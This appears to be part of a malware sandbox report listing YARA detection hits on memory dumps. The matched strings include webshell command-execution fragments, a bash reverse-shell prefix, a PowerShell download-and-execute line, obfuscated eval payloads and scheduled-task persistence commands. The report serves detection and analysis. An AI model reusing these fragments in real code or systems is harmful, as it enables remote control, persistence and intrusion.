- 0x1b720:$s3: ));(new Function(
|
0000000A.00000003.324570617.0000000006668000.00000004.00000001.sdmp | Hacktool_Strings_p0wnedShell | p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedShell.cs | Florian Roth | - 0x4558:$x5: p0wnedShellx64
|
0000000A.00000003.323986177.0000000002E7D000.00000004.00000001.sdmp | scanarator | Auto-generated rule on file scanarator.exe | yarGen Yara Rule Generator by Florian Roth | - 0x1f78:$s4: GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0
|
0000000A.00000003.323415245.0000000006628000.00000004.00000001.sdmp | webshell_webshells_new_PHP1 | Web shells - generated from file PHP1.php | Florian Roth | - 0x430:$s3: @preg_replace("/f/e",$_GET['u'],"fengjiao");
|
0000000A.00000003.323415245.0000000006628000.00000004.00000001.sdmp | h4ntu_shell__powered_by_tsoi_ | Semi-Auto-generated - file h4ntu shell [powered by tsoi | unknown | |
0000000A.00000003.313108656.0000000006641000.00000004.00000001.sdmp | FVEY_ShadowBroker_Auct_Dez16_Strings | String from the ShadowBroker Files Screenshots - Dec 2016 | Florian Roth | - 0x999e:$s2: Auditcleaner
- 0x7ece:$elf12: envoytomato
- 0x7f2e:$elf14: estopmoonlit
|
00000013.00000003.458084749.0000000006D9C000.00000004.00000001.sdmp | shankar_php_php | Semi-Auto-generated - file shankar.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | |
00000013.00000003.438854953.0000000006BFE000.00000004.00000001.sdmp | multiple_webshells_0015 | Semi-Auto-generated - from files wacking.php.php.txt, 1.txt, SpecialShell_99.php.php.txt, c100.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x215:$s1: $_POST['backconnectip']
|
00000013.00000003.438854953.0000000006BFE000.00000004.00000001.sdmp | Webshell_27_9_acid_c99_locus7s | Detects Webshell - rule generated from files 27.9.txt, acid.php, c99_locus7s.txt | Florian Roth | - 0x1f8:$s0: $blah = ex($p2." /tmp/back ".$_POST['backconnectip']." ".$_POST['backconnectport']." &");
|
00000013.00000003.443343261.0000000006BFE000.00000004.00000001.sdmp | multiple_webshells_0015 | Semi-Auto-generated - from files wacking.php.php.txt, 1.txt, SpecialShell_99.php.php.txt, c100.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x215:$s1: $_POST['backconnectip']
|
00000013.00000003.443343261.0000000006BFE000.00000004.00000001.sdmp | Webshell_27_9_acid_c99_locus7s | Detects Webshell - rule generated from files 27.9.txt, acid.php, c99_locus7s.txt | Florian Roth | - 0x1f8:$s0: $blah = ex($p2." /tmp/back ".$_POST['backconnectip']." ".$_POST['backconnectport']." &");
|
00000013.00000002.524614024.000000000242B000.00000004.00000001.sdmp | Amplia_Security_Tool | Amplia Security Tool | unknown | - 0x13a087:$a: Amplia Security
- 0x13a1ff:$a: Amplia Security
- 0x13a21d:$c: getlsasrvaddr.exe
- 0x13a23d:$d: Cannot get PID of LSASS.EXE
- 0x13a267:$e: extract the TGT session key
- 0x13a291:$f: PPWDUMP_DATA
|
00000013.00000002.524614024.000000000242B000.00000004.00000001.sdmp | scanarator | Auto-generated rule on file scanarator.exe | yarGen Yara Rule Generator by Florian Roth | - 0x139fbb:$s4: GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0
|
00000013.00000003.470647242.0000000006B9B000.00000004.00000001.sdmp | webshell_PHP_b37 | Web Shell - file b37.php | Florian Roth | - 0x220:$s0: xmg2/G4MZ7KpNveRaLgOJvBcqa2A8/sKWp9W93NLXpTTUgRc
|
00000013.00000003.428675269.0000000006B79000.00000004.00000001.sdmp | webshell_PHP_b37 | Web Shell - file b37.php | Florian Roth | - 0x22220:$s0: xmg2/G4MZ7KpNveRaLgOJvBcqa2A8/sKWp9W93NLXpTTUgRc
|
00000013.00000003.428675269.0000000006B79000.00000004.00000001.sdmp | Liz0ziM_Private_Safe_Mode_Command_Execuriton_Bypass_Exploit_php | Semi-Auto-generated - file Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x191db:$s1: Liz0ziM Private Safe Mode Command Execuriton Bypass
|
0000000A.00000002.552309239.00000000036C7000.00000004.00000001.sdmp | Amplia_Security_Tool | Amplia Security Tool | unknown | - 0x32bc:$a: Amplia Security
- 0x38ac:$a: Amplia Security
|
0000000A.00000003.310922017.00000000050BA000.00000004.00000001.sdmp | Amplia_Security_Tool | Amplia Security Tool | unknown | - 0x79d0:$a: Amplia Security
|
0000000A.00000003.310922017.00000000050BA000.00000004.00000001.sdmp | webshell_r57shell127_r57_iFX_r57_kartal_r57_antichat | Web Shell - from files r57shell127.php, r57_iFX.php, r57_kartal.php, r57.php, antichat.php | Florian Roth | - 0x7bf8:$s8: if(!empty($_POST['dif'])&&$fp) { @fputs($fp,$sql1.$sql2); }
- 0x7d38:$s9: foreach($values as $k=>$v) {$values[$k] = addslashes($v);}
|
0000000A.00000003.310922017.00000000050BA000.00000004.00000001.sdmp | Safe0ver_Shell__Safe_Mod_Bypass_By_Evilc0der_php | Semi-Auto-generated - file Safe0ver Shell -Safe Mod Bypass By Evilc0der.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | |
0000000A.00000003.325437911.0000000006654000.00000004.00000001.sdmp | Empire_Invoke_Shellcode | Empire - a pure PowerShell post-exploitation agent - file Invoke-Shellcode.ps1 | Florian Roth | - 0x308:$s2: "Injecting shellcode injecting into $((Get-Process -Id $ProcessId).ProcessName) ($ProcessId)!" ) )
|
0000000A.00000003.325437911.0000000006654000.00000004.00000001.sdmp | Liz0ziM_Private_Safe_Mode_Command_Execuriton_Bypass_Exploit_php | Semi-Auto-generated - file Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x48b:$s1: Liz0ziM Private Safe Mode Command Execuriton Bypass
|
0000000A.00000003.322843197.000000000684B000.00000004.00000001.sdmp | webshell_jsp_cmdjsp | Web Shell - file cmdjsp.jsp | Florian Roth | - 0xd88:$s5: <FORM METHOD=GET ACTION='cmdjsp.jsp'>
|
0000000A.00000003.322843197.000000000684B000.00000004.00000001.sdmp | webshell_sig_404super | Web shells - generated from file 404super.php | Florian Roth | - 0xc08:$s4: $i = pack('c*', 0x70, 0x61, 99, 107);
|
0000000A.00000003.322843197.000000000684B000.00000004.00000001.sdmp | webshell_webshells_new_Asp | Web shells - generated from file Asp.asp | Florian Roth | - 0xdc8:$s1: Execute MorfiCoder(")/*/z/*/(tseuqer lave")
|
00000013.00000003.485624536.0000000006BFE000.00000004.00000001.sdmp | multiple_webshells_0015 | Semi-Auto-generated - from files wacking.php.php.txt, 1.txt, SpecialShell_99.php.php.txt, c100.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x215:$s1: $_POST['backconnectip']
|
00000013.00000003.485624536.0000000006BFE000.00000004.00000001.sdmp | Webshell_27_9_acid_c99_locus7s | Detects Webshell - rule generated from files 27.9.txt, acid.php, c99_locus7s.txt | Florian Roth | - 0x1f8:$s0: $blah = ex($p2." /tmp/back ".$_POST['backconnectip']." ".$_POST['backconnectport']." &");
|
00000013.00000003.458213135.0000000006DE1000.00000004.00000001.sdmp | Amplia_Security_Tool | Amplia Security Tool | unknown | - 0x4caf0:$c: getlsasrvaddr.exe
- 0x50420:$e: extract the TGT session key
|
00000013.00000003.458213135.0000000006DE1000.00000004.00000001.sdmp | SQLMap | This signature detects the SQLMap SQL injection tool | Florian Roth | - 0x5e6f0:$s1: except SqlmapBaseException, ex:
|
00000013.00000003.458213135.0000000006DE1000.00000004.00000001.sdmp | PortRacer | Auto-generated rule on file PortRacer.exe | yarGen Yara Rule Generator by Florian Roth | - 0x50090:$s0: Auto Scroll BOTH Text Boxes
- 0x504e0:$s4: Start/Stop Portscanning
- 0x5e6b8:$s6: Auto Save LogFile by pressing STOP
|
00000013.00000003.422640827.00000000051E4000.00000004.00000001.sdmp | Amplia_Security_Tool | Amplia Security Tool | unknown | - 0xf580:$a: Amplia Security
|
00000013.00000003.422640827.00000000051E4000.00000004.00000001.sdmp | Fierce2 | This signature detects the Fierce2 domain scanner | Florian Roth | - 0xf398:$s1: $tt_xml->process( 'end_domainscan.tt', $end_domainscan_vars,
|
00000013.00000003.422640827.00000000051E4000.00000004.00000001.sdmp | webshell_Shell_ci_Biz_was_here_c100_v_xxx | Web Shell - from files Shell [ci | unknown | - 0xf758:$s3: <OPTION VALUE="find /etc/ -type f -perm -o+w 2> /dev/null"
- 0xf1b8:$s7: <OPTION VALUE="wget http://ftp.powernet.com.tr/supermail/de
|
00000013.00000003.422640827.00000000051E4000.00000004.00000001.sdmp | Safe0ver_Shell__Safe_Mod_Bypass_By_Evilc0der_php | Semi-Auto-generated - file Safe0ver Shell -Safe Mod Bypass By Evilc0der.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | |
0000000A.00000003.304068846.0000000005000000.00000004.00000001.sdmp | Volgmer_Malware | Detects Volgmer malware as reported in US CERT TA17-318B | Florian Roth | - 0x22fc2:$x1: User-Agent: Mozillar/5.0
- 0x23002:$x3: [TestConnect To Bot] - Port = %d
- 0x23027:$x4: b50a338264226b6d57c1936d9db140ba74a28930270a083353645a9b518661f4fcea160d7
- 0x2308a:$s2: H_%s_%016I64X_%04d%02d%02d%02d%02d%02d.TXT
- 0x230d5:$s4: %s\dllcache\%s.dll
- 0x230ec:$s5: Cond Fail.
- 0x230fb:$s6: The %s %s%s
- 0x2310b:$s7: %s "%s"%s "%s" %s "%s"
- 0x23126:$s8: DLL_Spider.dll
|
0000000A.00000003.304068846.0000000005000000.00000004.00000001.sdmp | RemCom_RemoteCommandExecution | Detects strings from RemCom tool | Florian Roth | - 0x1ee2c:$: \\.\pipe\%s%s%d
- 0x1ee3e:$: %s\pipe\%s%s%d%s
- 0x1ee51:$: \ADMIN$\System32\%s%s
|
0000000A.00000003.304068846.0000000005000000.00000004.00000001.sdmp | ProcessInjector_Gen | Detects a process injection utility that can be used for good and bad purposes | Florian Roth | - 0x10fd0:$x1: Error injecting remote thread in process:
- 0x10ffe:$s5: [-] Error getting access to process: %ld!
- 0x1102c:$s6: --process-name <name> Process name to inject
- 0x1105f:$s12: No injection target has been provided!
- 0x1108b:$s17: [-] An app path is required when not injecting!
|
0000000A.00000003.304068846.0000000005000000.00000004.00000001.sdmp | Lazagne_PW_Dumper | Detects Lazagne PW Dumper | Markus Neis / Florian Roth | - 0x13510:$s1: Crypto.Hash
- 0x13520:$s2: laZagne
- 0x1352c:$s3: impacket.winregistry
|
0000000A.00000003.304068846.0000000005000000.00000004.00000001.sdmp | SUSP_shellpop_Bash | Detects suspicious bash command | Tobias Michalski | - 0xce91:$: /bin/bash -i >& /dev/tcp/
|
0000000A.00000003.304068846.0000000005000000.00000004.00000001.sdmp | GoldDragon_Aux_File | Detects export from Gold Dragon - February 2018 | Florian Roth | - 0x1b5ff:$x1: /////////////////////regkeyenum////////////
- 0x1b8ac:$x1: /////////////////////regkeyenum////////////
|
0000000A.00000003.304068846.0000000005000000.00000004.00000001.sdmp | VBS_dropper_script_Dec17_1 | Detects a suspicious VBS script that drops an executable | Florian Roth | - 0x1ec7d:$s1: TVpTAQEAAAAEAA
- 0x1ec90:$s2: TVoAAAAAAAAAAA
- 0x1eca3:$s3: TVqAAAEAAAAEAB
- 0x1ecb6:$s4: TVpQAAIAAAAEAA
- 0x1ecc9:$s5: TVqQAAMAAAAEAA
- 0x223c6:$s5: TVqQAAMAAAAEAA
- 0x24783:$s5: TVqQAAMAAAAEAA
- 0x1ecdc:$a1: = CreateObject("Wscript.Shell")
|
0000000A.00000003.304068846.0000000005000000.00000004.00000001.sdmp | Lazarus_Dec_17_5 | Detects Lazarus malware from incident in Dec 2017 | Florian Roth | - 0x20484:$x1: $ProID = Start-Process powershell.exe -PassThru -WindowStyle Hidden -ArgumentList
- 0x204da:$x2: $respTxt = HttpRequestFunc_doprocess -szURI $szFullURL -szMethod $szMethod -contentData $contentData;
- 0x20544:$x3: [String]$PS_PATH = "C:\\Users\\Public\\Documents\\ProxyAutoUpdate.ps1";
- 0x20590:$x4: $cmdSchedule = 'schtasks /create /tn "ProxyServerUpdater"
- 0x205ce:$x5: /tr "powershell.exe -ep bypass -windowstyle hidden -file
- 0x2060c:$x6: C:\\Users\\Public\\Documents\\tmp' + -join
- 0x2063c:$x7: $cmdResult = cmd.exe /c $cmdInst | Out-String;
- 0x2066f:$x8: whoami /groups | findstr /c:"S-1-5-32-544"
|
0000000A.00000003.304068846.0000000005000000.00000004.00000001.sdmp | APT_Turla_Agent_BTZ_Gen_1 | Detects Turla Agent.BTZ | Florian Roth | - 0xaa9a:$x1: 1dM3uu4j7Fw4sjnbcwlDqet4F7JyuUi4m5Imnxl1pzxI6as80cbLnmz54cs5Ldn4ri3do5L6gs923HL34x2f5cvd0fk6c1a0s
- 0x1182c:$x1: 1dM3uu4j7Fw4sjnbcwlDqet4F7JyuUi4m5Imnxl1pzxI6as80cbLnmz54cs5Ldn4ri3do5L6gs923HL34x2f5cvd0fk6c1a0s
- 0xab00:$s1: release mutex - %u (%u)(%u)
- 0xab20:$s2: \system32\win.com
- 0x119af:$s2: \system32\win.com
- 0xab36:$s3: Command Id:%u%010u(%02d:%02d:%02d %02d/%02d/%04d)
- 0xab6c:$s4: MakeFile Error(%d) copy file to temp file %s
- 0xab9d:$s5: %s%%s08x.tmp
- 0xabae:$s6: Run instruction: %d ID:%u%010u(%02d:%02d:%02d %02d/%02d/%04d)
- 0xabf0:$s7: Mutex_Log
- 0xabfe:$s8: %s\system32\winview.ocx
- 0xac49:$s10: Error: pos(%d) > CmdSize(%d)
- 0xac6b:$s11: \win.com
- 0xac79:$s12: Error(%d) run %s
- 0xac90:$s13: %02d.%02d.%04d Log begin:
- 0x11991:$s13: %02d.%02d.%04d Log begin:
|
0000000A.00000003.304068846.0000000005000000.00000004.00000001.sdmp | Suspicious_BAT_Strings | Detects a string also used in Netwire RAT auxiliary | Florian Roth | - 0x1ddc6:$s1: ping 192.0.2.2 -n 1
|
0000000A.00000003.304068846.0000000005000000.00000004.00000001.sdmp | Turla_Mal_Script_Jan18_1 | Detects Turla malicious script | Florian Roth | - 0x1dfe1:$s1: .charCodeAt(i %
- 0x1dff6:$s2: {WScript.Quit();}
- 0x1e00c:$s3: .charAt(i)) << 10) |
- 0x1e025:$s4: = WScript.Arguments;var
- 0x1e043:$s5: = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";var i;
|
0000000A.00000003.304068846.0000000005000000.00000004.00000001.sdmp | VBS_Obfuscated_Mal_Feb18_1 | Detects malicious obfuscated VBS observed in February 2018 | Florian Roth | - 0x191c2:$x1: A( Array( (1* 2^1 )+
- 0x191db:$x2: .addcode(A( Array(
- 0x191f2:$x3: false:AA.send:Execute(AA.responsetext):end
- 0x19221:$x4: & A( Array( (1* 2^1 )+
- 0x1923d:$s1: .SYSTEMTYPE:NEXT:IF (UCASE(
- 0x1925d:$s2: A = STR:next:end function
- 0x1927b:$s3: &WSCRIPT.SCRIPTFULLNAME&CHR
|
0000000A.00000003.304068846.0000000005000000.00000004.00000001.sdmp | LokiBot_Dropper_ScanCopyPDF_Feb18 | Auto-generated rule - file Scan Copy.pdf.com | Florian Roth | - 0x186b5:$a1: C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB
- 0x188a1:$a1: C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB
- 0x18708:$s2: Unstalled2
|
0000000A.00000003.304068846.0000000005000000.00000004.00000001.sdmp | LokiBot_Dropper_Packed_R11_Feb18 | Auto-generated rule - file scan copy.pdf.r11 | Florian Roth | - 0x186b5:$s1: C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB
- 0x188a1:$s1: C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB
|
0000000A.00000003.304068846.0000000005000000.00000004.00000001.sdmp | PowerShell_Susp_Parameter_Combo | Detects PowerShell invocation with suspicious parameters | Florian Roth | - 0x21763:$sa1: -enc
- 0x217a0:$sb2: -window hidden
- 0x204b3:$sb3: -WindowStyle Hidden
- 0x205ec:$sb3: -windowstyle hidden
- 0xcbcc:$sc1: -nop
- 0xcbd1:$se1: -ep bypass
- 0x205e1:$se1: -ep bypass
- 0x21756:$se2: -exec bypass
- 0x21793:$se2: -exec bypass
- 0x1ac36:$se3: -ExecutionPolicy Bypass
- 0x21756:$se4: -exec bypass
- 0x21793:$se4: -exec bypass
|
0000000A.00000003.304068846.0000000005000000.00000004.00000001.sdmp | Armitage_msfconsole | Detects Armitage component | Florian Roth | - 0x1fb30:$s1: \umeterpreter\u >
- 0x1fb46:$s3: ^meterpreter >
- 0x1fb5a:$s11: \umsf\u>
|
0000000A.00000003.304068846.0000000005000000.00000004.00000001.sdmp | Armitage_OSX | Detects Armitage component | Florian Roth | - 0x1fc7a:$x1: resources/covertvpn-injector.exe
- 0x1fca0:$s10: resources/browserpivot.x64.dll
- 0x1fcc4:$s17: resources/msfrpcd_new.bat
|
0000000A.00000003.304068846.0000000005000000.00000004.00000001.sdmp | Silence_malware_2 | Detects malware sample mentioned in the Silence report on Securelist | Florian Roth | - 0x24c3a:$x1: \ScreenMonitorService\Release\smmsrv.pdb
- 0x24c67:$x2: \\.\pipe\{73F7975A-A4A2-4AB6-9121-AECAE68AABBB}
- 0x24c9b:$s1: My Sample Service: ServiceMain: SetServiceStatus returned error
- 0x24cdf:$s2: \mss.exe
- 0x24cec:$s3: \out.dat
- 0x24cf9:$s4: \mss.txt
- 0x24d06:$s5: Default monitor
|
0000000A.00000003.304068846.0000000005000000.00000004.00000001.sdmp | Invoke_Mimikatz | Detects Invoke-Mimikatz String | Florian Roth | - 0x24798:$x3: Write-BytesToMemory -Bytes $Shellcode1 -MemoryAddress $GetCommandLineWAddrTemp
|
0000000A.00000003.304068846.0000000005000000.00000004.00000001.sdmp | CoinMiner_Strings | Detects mining pool protocol string in Executable | Florian Roth | - 0x1e52c:$s1: stratum+tcp://
- 0x1e53f:$s2: "normalHashing": true,
|
0000000A.00000003.304068846.0000000005000000.00000004.00000001.sdmp | MAL_unspecified_Jan18_1 | Detects unspecified malware sample | Florian Roth | - 0x1dd71:$s1: User-Agent: Mozilla/4.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
- 0x1ddc6:$s2: ping 192.0.2.2 -n 1 -w %d >nul 2>&1
- 0x1ddee:$s3: [Log Started] - [%.2d/%.2d/%d %.2d:%.2d:%.2d]
- 0x1de20:$s4: start /b "" cmd /c del "%%~f0"&exit /b
- 0x1de4b:$s5: [%s] - [%.2d/%.2d/%d %.2d:%.2d:%.2d]
- 0x1de74:$s6: %s\%s.bat
- 0x1de82:$s7: DEL /s "%s" >nul 2>&1
|
0000000A.00000003.304068846.0000000005000000.00000004.00000001.sdmp | Invoke_PSImage | Detects a command to execute PowerShell from String | Florian Roth | - 0x207f2:$: IEX([System.Text.Encoding]::ASCII.GetString(
- 0x20821:$: System.Drawing.Bitmap((a Net.WebClient).OpenRead(
- 0x20855:$: 89 50 4E 47 0D 0A 1A 0A 00 00 00 0D 49 48 44 52 00 00 04 E4 00 00 03 A0 08 06 00 00 00 9D AF A9 ...
|
0000000A.00000003.304068846.0000000005000000.00000004.00000001.sdmp | malware_apt15_royaldll | DLL implant, originally rights.dll and runs as a service | David Cannings | - 0x1488f:$: Nwsapagent
- 0x1487a:$: "%s">>"%s"\s.txt
- 0x1483a:$: del c:\windows\temp\r.exe /f /q
|
0000000A.00000003.304068846.0000000005000000.00000004.00000001.sdmp | JoeSecurity_Coinhive | Yara detected Coinhive miner | Joe Security | |
0000000A.00000003.304068846.0000000005000000.00000004.00000001.sdmp | JoeSecurity_WebMonitor | Yara detected WebMonitor RAT | Joe Security | |
0000000A.00000003.304068846.0000000005000000.00000004.00000001.sdmp | JoeSecurity_MiniRAT | Yara detected Mini RAT | Joe Security | |
0000000A.00000003.304068846.0000000005000000.00000004.00000001.sdmp | JoeSecurity_ComRAT_XORKey | Yara detected Turla ComRAT XORKey | Joe Security | |
0000000A.00000003.304068846.0000000005000000.00000004.00000001.sdmp | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security | |
0000000A.00000003.304068846.0000000005000000.00000004.00000001.sdmp | netwire | detect netwire in memory | JPCERT/CC Incident Response Group | - 0x1ddc6:$ping: ping 192.0.2.2
- 0x1ddee:$log: [Log Started] - [%.2d/%.2d/%d %.2d:%.2d:%.2d]
|
0000000A.00000003.312268650.0000000006667000.00000004.00000001.sdmp | Hacktool_Strings_p0wnedShell | p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedShell.cs | Florian Roth | - 0x5558:$x5: p0wnedShellx64
|
0000000A.00000003.324870228.0000000006654000.00000004.00000001.sdmp | Empire_Invoke_Shellcode | Empire - a pure PowerShell post-exploitation agent - file Invoke-Shellcode.ps1 | Florian Roth | - 0x308:$s2: "Injecting shellcode injecting into $((Get-Process -Id $ProcessId).ProcessName) ($ProcessId)!" ) )
|
0000000A.00000003.324870228.0000000006654000.00000004.00000001.sdmp | Liz0ziM_Private_Safe_Mode_Command_Execuriton_Bypass_Exploit_php | Semi-Auto-generated - file Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x48b:$s1: Liz0ziM Private Safe Mode Command Execuriton Bypass
|
00000013.00000003.441709320.0000000006BFE000.00000004.00000001.sdmp | multiple_webshells_0015 | Semi-Auto-generated - from files wacking.php.php.txt, 1.txt, SpecialShell_99.php.php.txt, c100.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x215:$s1: $_POST['backconnectip']
|
00000013.00000003.441709320.0000000006BFE000.00000004.00000001.sdmp | Webshell_27_9_acid_c99_locus7s | Detects Webshell - rule generated from from files 27.9.txt, acid.php, c99_locus7s.txt | Florian Roth | - 0x1f8:$s0: $blah = ex($p2." /tmp/back ".$_POST['backconnectip']." ".$_POST['backconnectport']." &");
|
00000013.00000003.481501193.0000000006DCE000.00000004.00000001.sdmp | Amplia_Security_Tool | Amplia Security Tool | unknown | |
0000000A.00000003.324781029.00000000068E9000.00000004.00000001.sdmp | Amplia_Security_Tool | Amplia Security Tool | unknown | - 0x11d0:$a: Amplia Security
- 0x1180:$c: getlsasrvaddr.exe
|
00000013.00000003.473662008.0000000006B9B000.00000004.00000001.sdmp | webshell_PHP_b37 | Web Shell - file b37.php | Florian Roth | - 0x220:$s0: xmg2/G4MZ7KpNveRaLgOJvBcqa2A8/sKWp9W93NLXpTTUgRc
|
00000013.00000003.481442342.0000000006D9C000.00000004.00000001.sdmp | shankar_php_php | Semi-Auto-generated - file shankar.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | |
0000000A.00000003.325135478.0000000006854000.00000004.00000001.sdmp | shankar_php_php | Semi-Auto-generated - file shankar.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | |
00000013.00000003.463235186.0000000006E38000.00000004.00000001.sdmp | SQLMap | This signature detects the SQLMap SQL injection tool | Florian Roth | - 0x76f0:$s1: except SqlmapBaseException, ex:
|
00000013.00000003.470663077.0000000006BA5000.00000004.00000001.sdmp | Hacktool_Strings_p0wnedShell | p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedShell.cs | Florian Roth | - 0x8818:$x5: p0wnedShellx64
|
0000000A.00000003.324504797.0000000006892000.00000004.00000001.sdmp | Amplia_Security_Tool | Amplia Security Tool | unknown | |
0000000A.00000003.325168966.0000000006892000.00000004.00000001.sdmp | Amplia_Security_Tool | Amplia Security Tool | unknown | |
00000013.00000003.477379778.00000000051F3000.00000004.00000001.sdmp | Amplia_Security_Tool | Amplia Security Tool | unknown | - 0x580:$a: Amplia Security
|
00000013.00000003.477379778.00000000051F3000.00000004.00000001.sdmp | Fierce2 | This signature detects the Fierce2 domain scanner | Florian Roth | - 0x398:$s1: $tt_xml->process( 'end_domainscan.tt', $end_domainscan_vars,
|
00000013.00000003.477379778.00000000051F3000.00000004.00000001.sdmp | webshell_Shell_ci_Biz_was_here_c100_v_xxx | Web Shell - from files Shell [ci | unknown | - 0x758:$s3: <OPTION VALUE="find /etc/ -type f -perm -o+w 2> /dev/null"
- 0x1b8:$s7: <OPTION VALUE="wget http://ftp.powernet.com.tr/supermail/de
|
00000013.00000003.477379778.00000000051F3000.00000004.00000001.sdmp | Safe0ver_Shell__Safe_Mod_Bypass_By_Evilc0der_php | Semi-Auto-generated - file Safe0ver Shell -Safe Mod Bypass By Evilc0der.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | |
0000000A.00000003.312103557.0000000006629000.00000004.00000001.sdmp | FVEY_ShadowBroker_Auct_Dez16_Strings | String from the ShodowBroker Files Screenshots - Dec 2016 | Florian Roth | - 0x2199e:$s2: Auditcleaner
- 0x1fece:$elf12: envoytomato
- 0x1ff2e:$elf14: estopmoonlit
|
00000013.00000002.541755283.0000000002FA0000.00000004.00000040.sdmp | Amplia_Security_Tool | Amplia Security Tool | unknown | |
00000013.00000003.455300807.0000000006D6F000.00000004.00000001.sdmp | webshell_php_gzinflated | PHP webshell which directly eval()s obfuscated string | Arnim Rupp | - 0x12e80:$php: <?
- 0x15668:$php: <?
- 0x16959:$php: <?
- 0x18dd8:$php: <?
- 0x18dde:$payload3: eval(gzuncompress(base64_decode(
|
00000013.00000003.455300807.0000000006D6F000.00000004.00000001.sdmp | webshell_php_h6ss | Web Shell - file h6ss.php | Florian Roth | - 0x18dd8:$s0: <?php eval(gzuncompress(base64_decode("
|
00000013.00000003.477128932.00000000052EB000.00000004.00000001.sdmp | FVEY_ShadowBroker_Auct_Dez16_Strings | String from the ShodowBroker Files Screenshots - Dec 2016 | Florian Roth | - 0x1f5e:$s2: Auditcleaner
- 0x36a6:$s11: elatedmonkey
- 0x3716:$elf4: charm_saver
- 0x276e:$elf12: envoytomato
- 0x273e:$elf14: estopmoonlit
- 0x38d7:$elf17: ghost_sparc
- 0x31c6:$elf19: orleans_stride
- 0x2ec6:$elf21: seconddate
- 0x3716:$pe2: charm_saver
- 0x38e3:$pe3: ghost_x86
|
00000013.00000003.416659119.0000000005137000.00000004.00000001.sdmp | Volgmer_Malware | Detects Volgmer malware as reported in US CERT TA17-318B | Florian Roth | - 0x1bfc2:$x1: User-Agent: Mozillar/5.0
- 0x1c002:$x3: [TestConnect To Bot] - Port = %d
- 0x1c027:$x4: b50a338264226b6d57c1936d9db140ba74a28930270a083353645a9b518661f4fcea160d7
- 0x1c08a:$s2: H_%s_%016I64X_%04d%02d%02d%02d%02d%02d.TXT
- 0x1c0d5:$s4: %s\dllcache\%s.dll
- 0x1c0ec:$s5: Cond Fail.
- 0x1c0fb:$s6: The %s %s%s
- 0x1c10b:$s7: %s "%s"%s "%s" %s "%s"
- 0x1c126:$s8: DLL_Spider.dll
|
00000013.00000003.416659119.0000000005137000.00000004.00000001.sdmp | RemCom_RemoteCommandExecution | Detects strings from RemCom tool | Florian Roth | - 0x17e2c:$: \\.\pipe\%s%s%d
- 0x17e3e:$: %s\pipe\%s%s%d%s
- 0x17e51:$: \ADMIN$\System32\%s%s
|
00000013.00000003.416659119.0000000005137000.00000004.00000001.sdmp | ProcessInjector_Gen | Detects a process injection utility that can be used ofr good and bad purposes | Florian Roth | - 0x9fd0:$x1: Error injecting remote thread in process:
- 0x9ffe:$s5: [-] Error getting access to process: %ld!
- 0xa02c:$s6: --process-name <name> Process name to inject
- 0xa05f:$s12: No injection target has been provided!
- 0xa08b:$s17: [-] An app path is required when not injecting!
|
00000013.00000003.416659119.0000000005137000.00000004.00000001.sdmp | Lazagne_PW_Dumper | Detects Lazagne PW Dumper | Markus Neis / Florian Roth | - 0xc510:$s1: Crypto.Hash
- 0xc520:$s2: laZagne
- 0xc52c:$s3: impacket.winregistry
|
00000013.00000003.416659119.0000000005137000.00000004.00000001.sdmp | SUSP_shellpop_Bash | Detects susupicious bash command | Tobias Michalski | - 0x5e91:$: /bin/bash -i >& /dev/tcp/
|
00000013.00000003.416659119.0000000005137000.00000004.00000001.sdmp | GoldDragon_Aux_File | Detects export from Gold Dragon - February 2018 | Florian Roth | - 0x145ff:$x1: /////////////////////regkeyenum////////////
- 0x148ac:$x1: /////////////////////regkeyenum////////////
|
00000013.00000003.416659119.0000000005137000.00000004.00000001.sdmp | VBS_dropper_script_Dec17_1 | Detects a supicious VBS script that drops an executable | Florian Roth | - 0x17c7d:$s1: TVpTAQEAAAAEAA
- 0x17c90:$s2: TVoAAAAAAAAAAA
- 0x17ca3:$s3: TVqAAAEAAAAEAB
- 0x17cb6:$s4: TVpQAAIAAAAEAA
- 0x17cc9:$s5: TVqQAAMAAAAEAA
- 0x1b3c6:$s5: TVqQAAMAAAAEAA
- 0x1d783:$s5: TVqQAAMAAAAEAA
- 0x17cdc:$a1: = CreateObject("Wscript.Shell")
|
00000013.00000003.416659119.0000000005137000.00000004.00000001.sdmp | Lazarus_Dec_17_5 | Detects Lazarus malware from incident in Dec 2017 | Florian Roth | - 0x19484:$x1: $ProID = Start-Process powershell.exe -PassThru -WindowStyle Hidden -ArgumentList
- 0x194da:$x2: $respTxt = HttpRequestFunc_doprocess -szURI $szFullURL -szMethod $szMethod -contentData $contentData;
- 0x19544:$x3: [String]$PS_PATH = "C:\\Users\\Public\\Documents\\ProxyAutoUpdate.ps1";
- 0x19590:$x4: $cmdSchedule = 'schtasks /create /tn "ProxyServerUpdater"
